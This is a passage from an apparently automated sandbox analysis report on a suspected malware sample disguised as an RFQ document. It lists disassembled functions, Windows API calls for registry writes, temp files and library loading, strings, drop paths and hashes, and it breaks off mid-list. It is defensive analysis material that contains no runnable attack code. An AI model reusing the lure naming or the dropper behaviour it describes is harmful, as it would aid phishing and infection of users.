Instruction Fuzzy Hash: 41F0FC31511119AACF10BB64DD0DF9B375C9B00305F10847AE546F10D0EB789A68CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00402EAE Relevance: 7.6, APIs: 5, Instructions: 84
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402F02
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F4E
RegCloseKey.ADVAPI32(?,?,?), ref: 00402F57
RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F6E
RegCloseKey.ADVAPI32(?,?,?), ref: 00402F79

Memory Dump Source

Source File: 00000000.00000002.1666865220.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1666846826.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666879868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-SulselBarruII2-COALCOMMLDOC.jbxd

Similarity

API ID: CloseEnum$DeleteValue
String ID:
API String ID: 1354259210-0
Opcode ID: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
Instruction ID: 48bf034c557530f45265713f896c64b121a5f1f2f5b25ab6521791cb913d5ed3
Opcode Fuzzy Hash: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
Instruction Fuzzy Hash: 74215A7150010ABFDF119F90CE89EEF7B7DEB54388F110076B949B11A0D7B49E54AA68

Uniqueness

Uniqueness Score: -1.00%

Function 00401C48 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
windowtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB8
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CD0

Strings

!, xrefs: 00401C84

Memory Dump Source

Source File: 00000000.00000002.1666865220.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1666846826.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666879868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-SulselBarruII2-COALCOMMLDOC.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 0b60248b2d317c3fadb7ed9affa728e8142f9e62085aaabdbec9824b10747ad3
Instruction ID: dc9a0f57bab323a5eda2152a626e9899419b02716f24503a8b80c8a4184e75e9
Opcode Fuzzy Hash: 0b60248b2d317c3fadb7ed9affa728e8142f9e62085aaabdbec9824b10747ad3
Instruction Fuzzy Hash: E921AD71D1421AAFEB05AFA4D94AAFE7BB0EF84304F10453EF601B61D0D7B84941CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0040248F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(Software\ukasens\,00000023,00000011,00000002), ref: 004024DA
RegSetValueExW.KERNELBASE(?,?,?,?,Software\ukasens\,00000000,00000011,00000002), ref: 0040251A
RegCloseKey.KERNELBASE(?,?,?,Software\ukasens\,00000000,00000011,00000002), ref: 00402602

Strings

Software\ukasens\, xrefs: 004024CB, 004024D9, 004024F0, 00402504, 0040250F

Memory Dump Source

Source File: 00000000.00000002.1666865220.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1666846826.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666879868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-SulselBarruII2-COALCOMMLDOC.jbxd

Similarity

API ID: CloseValuelstrlen
String ID: Software\ukasens\
API String ID: 2655323295-3187526247
Opcode ID: 8e1b5111da33e5837339166b14f546e7548dccb5c0fd5daf16ba01e681e634b0
Instruction ID: 9515a87f615354861ff9cc8d48f56862c3e7cd04d157db2ad705c0a1b7eb65e0
Opcode Fuzzy Hash: 8e1b5111da33e5837339166b14f546e7548dccb5c0fd5daf16ba01e681e634b0
Instruction Fuzzy Hash: 45116D71900118BEEB11EFA5DE59AAEBAB4AF54318F10443FF504B61C1C7B98E419A58

Uniqueness

Uniqueness Score: -1.00%

Function 00406040 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 0040605E
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004034FA,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6), ref: 00406079

Strings

nsa, xrefs: 0040604D
C:\Users\user\AppData\Local\Temp\, xrefs: 00406045

Memory Dump Source

Source File: 00000000.00000002.1666865220.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1666846826.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666879868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-SulselBarruII2-COALCOMMLDOC.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-678247507
Opcode ID: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
Instruction ID: 4304e6ca34acc2e603ac9508cdf3fa98200610ac432ccd05af3fd9fdb7d66135
Opcode Fuzzy Hash: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
Instruction Fuzzy Hash: 58F09676B40204FBDB10CF55ED05F9EB7ACEB95750F11403AEE05F7140E6B099548768

Uniqueness

Uniqueness Score: -1.00%

Function 004015C6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 00405E9B: CharNextW.USER32(?,?,00425710,?,00405F0F,00425710,00425710,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C4D,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\RFQ-SulselBarruII2-COALCOMMLDOC.exe"), ref: 00405EA9
Part of subcall function 00405E9B: CharNextW.USER32(00000000), ref: 00405EAE
Part of subcall function 00405E9B: CharNextW.USER32(00000000), ref: 00405EC6

GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161F

Part of subcall function 00405A75: CreateDirectoryW.KERNEL32(0042C800,?), ref: 00405AB7

SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Ubarberet\Graustark\resultalet,?,00000000,000000F0), ref: 00401652

Strings

C:\Users\user\AppData\Local\Ubarberet\Graustark\resultalet, xrefs: 00401645

Memory Dump Source

Source File: 00000000.00000002.1666865220.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1666846826.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666879868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-SulselBarruII2-COALCOMMLDOC.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Local\Ubarberet\Graustark\resultalet
API String ID: 1892508949-3984083083
Opcode ID: 4b002bd3db797feb485ac42b8ac0358935621071ec5b2f7eb86a747276a148f4
Instruction ID: ceaefb5432ba9a2b041ab88b04bec91c1a8495824eafa6d8534a6d53eb807851
Opcode Fuzzy Hash: 4b002bd3db797feb485ac42b8ac0358935621071ec5b2f7eb86a747276a148f4
Instruction Fuzzy Hash: 2D11D031504604ABCF206FA5CD4099F36B0EF04368B29493FE941B22E1DA3E4E819E8E

Uniqueness

Uniqueness Score: -1.00%

Function 004063EF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(?,00000000,00000000,?,?,00000800,00000000,?,?,?,?,: Completed,?,00000000,00406660,80000002), ref: 00406435
RegCloseKey.ADVAPI32(?), ref: 00406440

Strings

: Completed, xrefs: 004063F6

Memory Dump Source

Source File: 00000000.00000002.1666865220.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1666846826.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666879868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-SulselBarruII2-COALCOMMLDOC.jbxd

Similarity

API ID: CloseQueryValue
String ID: : Completed
API String ID: 3356406503-2954849223
Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
Instruction ID: 441e6d046e2572fd66e4c77006f0a98464fe89a944563537cf106c849ea921cc
Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
Instruction Fuzzy Hash: 4F017172500209ABDF218F51CD05EDB3BA9EB54354F01403AFD1992191D738D968DF94

Uniqueness

Uniqueness Score: -1.00%

Function 00407074 Relevance: 5.2, APIs: 4, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1666865220.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1666846826.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666879868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-SulselBarruII2-COALCOMMLDOC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aff26f2f30a057b7958a1e63094fc459aa306f2dc33e22a09454c964c074026f
Instruction ID: 2d246cc9a99bab59b70d05231fecbcf7b107c6ac3beee636f2a296df3f85dc82
Opcode Fuzzy Hash: aff26f2f30a057b7958a1e63094fc459aa306f2dc33e22a09454c964c074026f
Instruction Fuzzy Hash: 7DA14571E04228DBDF28CFA8C8546ADBBB1FF44305F10816AD856BB281D7786986DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00407275 Relevance: 5.2, APIs: 4, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1666865220.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1666846826.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666879868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-SulselBarruII2-COALCOMMLDOC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ac8a4bfdb441625c816955e49305bbe8ba575533dfee591c2cbe8a61bd4ebd3
Instruction ID: 7b0bebd33542e08950ef610181a47380a5391ae5859bceecccad38cd1577eaed
Opcode Fuzzy Hash: 3ac8a4bfdb441625c816955e49305bbe8ba575533dfee591c2cbe8a61bd4ebd3
Instruction Fuzzy Hash: 90911370E04228CBDF28CF98C854BADBBB1FF44305F14816AD856BB291D778A986DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00406F8B Relevance: 5.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1666865220.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1666846826.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666879868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-SulselBarruII2-COALCOMMLDOC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4946c792fe510ceb6f898f1d350858136886e798b9c642bfd65d449563e2a9d8
Instruction ID: bb56daa647bdc5b8eebe4baaa8fd529e9884befb34821132b6d53cadc5dab3c5
Opcode Fuzzy Hash: 4946c792fe510ceb6f898f1d350858136886e798b9c642bfd65d449563e2a9d8
Instruction Fuzzy Hash: 84814571E04228DBDF24CFA8C844BADBBB1FF44305F24816AD456BB281D778A986DF05

Uniqueness

Uniqueness Score: -1.00%

Function 00406A90 Relevance: 5.2, APIs: 4, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1666865220.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1666846826.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666879868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-SulselBarruII2-COALCOMMLDOC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40acfd0569c51a0ed8326a41ceea3e1cadcd4e5eff2ca22ce679809f46488b45
Instruction ID: 4c059968f2e2b24eb1e5e0c9ef09b3253d11b2009d36a285a9eb138ea7c1b005
Opcode Fuzzy Hash: 40acfd0569c51a0ed8326a41ceea3e1cadcd4e5eff2ca22ce679809f46488b45
Instruction Fuzzy Hash: 5B815971E04228DBDF24CFA8C8447ADBBB0FF44305F20816AD456BB281D7786986DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00406EDE Relevance: 5.2, APIs: 4, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1666865220.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1666846826.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666879868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-SulselBarruII2-COALCOMMLDOC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ecfdc6a50dff7d8916ace13d1bdc0889b51af96eca2ccc09b1dd9eb10df24f6
Instruction ID: d60cf97a253a7e6a69b3ee1887f4eadeccf904993e12f72ad3f9abe973951288
Opcode Fuzzy Hash: 7ecfdc6a50dff7d8916ace13d1bdc0889b51af96eca2ccc09b1dd9eb10df24f6
Instruction Fuzzy Hash: A1711371E04228DBDF24CFA8C844BADBBB1FF44305F15806AD856BB281D778A986DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00406FFC Relevance: 5.2, APIs: 4, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1666865220.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1666846826.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666879868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-SulselBarruII2-COALCOMMLDOC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c11de4171378e898cf9dd0cf6cc2122b5d0c7e9a287f85b53884598f27a71e29
Instruction ID: 85b777fa610547d2183482adb232412925907ddbdaa1129d6a49a25a13354a82
Opcode Fuzzy Hash: c11de4171378e898cf9dd0cf6cc2122b5d0c7e9a287f85b53884598f27a71e29
Instruction Fuzzy Hash: 9D714671E04228DBDF28CF98C844BADBBB1FF44305F14816AD856BB281D778A986DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00406F48 Relevance: 5.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1666865220.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1666846826.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666879868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-SulselBarruII2-COALCOMMLDOC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1fa58480ac5da56fa6cc6281bf6ff7b0f773126a89d504887f275dca7af18c3
Instruction ID: 068c41ea6699cb9b24c5d93e390f6e15a746ef4a0ce6273c00671ddd4a3661d6
Opcode Fuzzy Hash: f1fa58480ac5da56fa6cc6281bf6ff7b0f773126a89d504887f275dca7af18c3
Instruction Fuzzy Hash: E0715771E04228DBDF24CF98C844BADBBB1FF44305F15806AD856BB281C778AA86DF45

Uniqueness

Uniqueness Score: -1.00%

Function 004020DD Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 00402108

Part of subcall function 004055A6: lstrlenW.KERNEL32(spilfgterier,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033F2,00000000,?), ref: 004055DE
Part of subcall function 004055A6: lstrlenW.KERNEL32(004033F2,spilfgterier,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033F2,00000000), ref: 004055EE
Part of subcall function 004055A6: lstrcatW.KERNEL32(spilfgterier,004033F2), ref: 00405601
Part of subcall function 004055A6: SetWindowTextW.USER32(spilfgterier,spilfgterier), ref: 00405613
Part of subcall function 004055A6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405639
Part of subcall function 004055A6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405653
Part of subcall function 004055A6: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405661

LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00402119
FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402196

Memory Dump Source

Source File: 00000000.00000002.1666865220.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1666846826.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666879868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
